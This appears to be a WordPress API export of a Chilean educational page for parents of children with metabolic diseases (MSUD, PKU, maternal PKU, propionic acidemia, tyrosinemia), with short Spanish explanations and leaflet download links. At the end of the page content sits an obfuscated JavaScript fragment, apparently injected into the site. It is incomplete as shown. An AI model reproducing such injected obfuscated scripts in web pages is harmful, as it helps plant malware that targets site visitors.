{"id":244,"date":"2022-01-02T23:13:57","date_gmt":"2022-01-03T02:13:57","guid":{"rendered":"http:\/\/metabolicaschile.cl\/new-site\/?page_id=244"},"modified":"2022-04-17T22:02:03","modified_gmt":"2022-04-18T02:02:03","slug":"material-educativo","status":"publish","type":"page","link":"https:\/\/metabolicaschile.cl\/new-site\/material-educativo\/","title":{"rendered":"Material Educativo"},"content":{"rendered":"\n<h2>Mi hijo\/a tiene<\/h2>\n\n\n\n<h3>Enfermedad de la orina olor jarabe de arce (MSUD)<\/h3>\n\n\n\n<p>La EOJA es una enfermedad cr\u00f3nica, lo que significa que es una condici\u00f3n que se mantendr\u00e1 durante toda la vida, por lo que es muy importante que los padres y el grupo familiar comprendan por qu\u00e9 se produce esta enfermedad, c\u00f3mo se hereda, cu\u00e1l es el tratamiento y c\u00f3mo actuar para evitar posibles descompensaciones.<\/p>\n\n\n\n<figure class=\"wp-block-image size-medium\"><a href=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2021\/12\/MSUD_folleto_v4.pdf\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" width=\"153\" height=\"300\" src=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/MSUD_folleto_v4_page-0001-1-153x300.jpg\" alt=\"\" class=\"wp-image-736\" srcset=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/MSUD_folleto_v4_page-0001-1-153x300.jpg 153w, https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/MSUD_folleto_v4_page-0001-1-522x1024.jpg 522w, https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/MSUD_folleto_v4_page-0001-1.jpg 650w\" sizes=\"(max-width: 153px) 100vw, 153px\" \/><\/a><\/figure>\n\n\n\n<div class=\"wp-block-file\"><a href=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2021\/12\/MSUD_folleto_v4.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">MSUD_folleto_v4<\/a><a href=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2021\/12\/MSUD_folleto_v4.pdf\" class=\"wp-block-file__button\" download>Descargar<\/a><\/div>\n\n\n\n<div class=\"wp-container-1 wp-block-buttons\"><\/div>\n\n\n\n<h3>Fenilquetonuria (PKU)<\/h3>\n\n\n\n<p>El los ni\u00f1os\/as con PKU, esta enzima (Fenilalanina Hidroxilasa) no funciona completamente o funciona parcialmente, por lo que la FA se acumula en la sangre y otros l\u00edquidos de su cuerpo, produciendo alteraciones en el cerebro y ocasionando discapacidad intelectual grave, si el tratamiento no se inicia en forma oportuna.<\/p>\n\n\n\n<figure class=\"wp-block-image size-medium\"><a href=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/01\/PKU_folleto_v5.pdf\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" width=\"153\" height=\"300\" src=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/PKU_folleto_v5_page-0001-153x300.jpg\" alt=\"\" class=\"wp-image-741\" srcset=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/PKU_folleto_v5_page-0001-153x300.jpg 153w, https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/PKU_folleto_v5_page-0001-522x1024.jpg 522w, https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/PKU_folleto_v5_page-0001.jpg 650w\" sizes=\"(max-width: 153px) 100vw, 153px\" \/><\/a><\/figure>\n\n\n\n<div class=\"wp-block-file\"><a href=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/01\/PKU_folleto_v5.pdf\">PKU_folleto_v5<\/a><a href=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/01\/PKU_folleto_v5.pdf\" class=\"wp-block-file__button\" download>Descargar<\/a><\/div>\n\n\n\n<h3>Pku Materno<\/h3>\n\n\n\n<p>\u00bfQu\u00e9 pasa cuando una mujer PKU queda embarazada? El nivel (FA) debe controlarse de por vida y mantenerse entre un rango 2-6 mg\/dL (120 a 360 umo\/L).<\/p>\n\n\n\n<p>En un embarazo, a trav\u00e9s de la placenta se traspasan varios nutrientes que ayudan a la formaci\u00f3n del beb\u00e9, as\u00ed como tambi\u00e9n traspasa la FA. <strong>Si tu nivel de FA en sangre est\u00e1 alto, tu guagua lo tendr\u00e1 2-3 veces m\u00e1s alto<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-medium\"><a href=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/01\/PKU-MATERNO-2021.pdf\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" width=\"153\" height=\"300\" src=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/PKU_emb_folleto_page-0001-153x300.jpg\" alt=\"\" class=\"wp-image-743\" srcset=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/PKU_emb_folleto_page-0001-153x300.jpg 153w, https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/PKU_emb_folleto_page-0001-522x1024.jpg 522w, https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/PKU_emb_folleto_page-0001.jpg 650w\" sizes=\"(max-width: 153px) 100vw, 153px\" \/><\/a><\/figure>\n\n\n\n<div class=\"wp-block-file\"><a href=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/01\/PKU-MATERNO-2021.pdf\">PKU-MATERNO-2021<\/a><a href=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/01\/PKU-MATERNO-2021.pdf\" class=\"wp-block-file__button\" download>Descargar<\/a><\/div>\n\n\n\n<h3>Acidemia Propi\u00f3nica (AP)<\/h3>\n\n\n\n<p>El presente documento tiene por objetivo entregar informaci\u00f3n relevante a los padres que tengan una hija o hijo con Acidemia Propi\u00f3nica (AP). La AP es una enfermedad cr\u00f3nica, lo que significa que el tratamiento ser\u00e1 para toda la vida. La AP se produce por deficiencia o ausencia de la enzima PC, provocando la acumulaci\u00f3n de los MTVI en la sangre. Esto produce la s\u00edntesis de ciertos \u00e1cidos org\u00e1nicos, los que alteran v\u00edas metab\u00f3licas importantes, causando elevaci\u00f3n del nivel de AMONIO lo ques EXTREMADAMENTE T\u00d3XICO para el cerebro de su hija\/hijo.<\/p>\n\n\n\n<figure class=\"wp-block-image size-medium\"><a href=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2021\/12\/AP_folleto-1.pdf\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" width=\"153\" height=\"300\" src=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/AP_folleto_page-0001-153x300.jpg\" alt=\"\" class=\"wp-image-746\" srcset=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/AP_folleto_page-0001-153x300.jpg 153w, https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/AP_folleto_page-0001-522x1024.jpg 522w, https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/AP_folleto_page-0001.jpg 650w\" sizes=\"(max-width: 153px) 100vw, 153px\" \/><\/a><\/figure>\n\n\n\n<div class=\"wp-block-file\"><a href=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2021\/12\/AP_folleto-1.pdf\">AP_folleto-1<\/a><a href=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2021\/12\/AP_folleto-1.pdf\" class=\"wp-block-file__button\" download>Descargar<\/a><\/div>\n\n\n\n<h3>Tirosinemia tipo I  (Tir-1) <\/h3>\n\n\n\n<p>El presente documento tiene por objetivo proporcionar la informaci\u00f3n b\u00e1sica que necesitan conocer los padres de un ni\u00f1o\/a con Tirosinemia Tipo 1 (Tir-1).<\/p>\n\n\n\n<p>Recibir el diagn\u00f3stico de una enfermedad cr\u00f3nica a una edad tan temprana, puede resultar un impacto para los padres. Este puede estar acompa\u00f1ado de fuertes sentimientos de miedo, tristeza y\/o rabia. Es importante que usted sepa que casi todos los padres al recibir la noticia que su hijo tiene una TIR-1 han experimentado sentimientos similares.<\/p>\n\n\n\n<figure class=\"wp-block-image size-medium\"><a href=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/02\/Mi-hijo-tiene-TIR1.pdf\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" width=\"153\" height=\"300\" src=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/TIR1_folleto_page-0001-153x300.jpg\" alt=\"\" class=\"wp-image-748\" srcset=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/TIR1_folleto_page-0001-153x300.jpg 153w, https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/TIR1_folleto_page-0001-522x1024.jpg 522w, https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/TIR1_folleto_page-0001.jpg 650w\" sizes=\"(max-width: 153px) 100vw, 153px\" \/><\/a><\/figure>\n\n\n\n<div class=\"wp-block-file\"><a href=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/02\/Mi-hijo-tiene-TIR1.pdf\">Mi-hijo-tiene-TIR1<\/a><a href=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/02\/Mi-hijo-tiene-TIR1.pdf\" class=\"wp-block-file__button\" download>Descarga<\/a><\/div>\n\r\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script>","protected":false},"excerpt":{"rendered":"<p>Mi hijo\/a tiene Enfermedad de la orina olor jarabe de arce (MSUD) La EOJA es una enfermedad cr\u00f3nica, lo que significa que es una condici\u00f3n que se mantendr\u00e1 durante toda la vida, por lo que es muy importante que los padres y el grupo familiar comprendan por qu\u00e9 se produce [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":417,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/pages\/244"}],"collection":[{"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/comments?post=244"}],"version-history":[{"count":15,"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/pages\/244\/revisions"}],"predecessor-version":[{"id":915,"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/pages\/244\/revisions\/915"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/media\/417"}],"wp:attachment":[{"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/media?parent=244"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}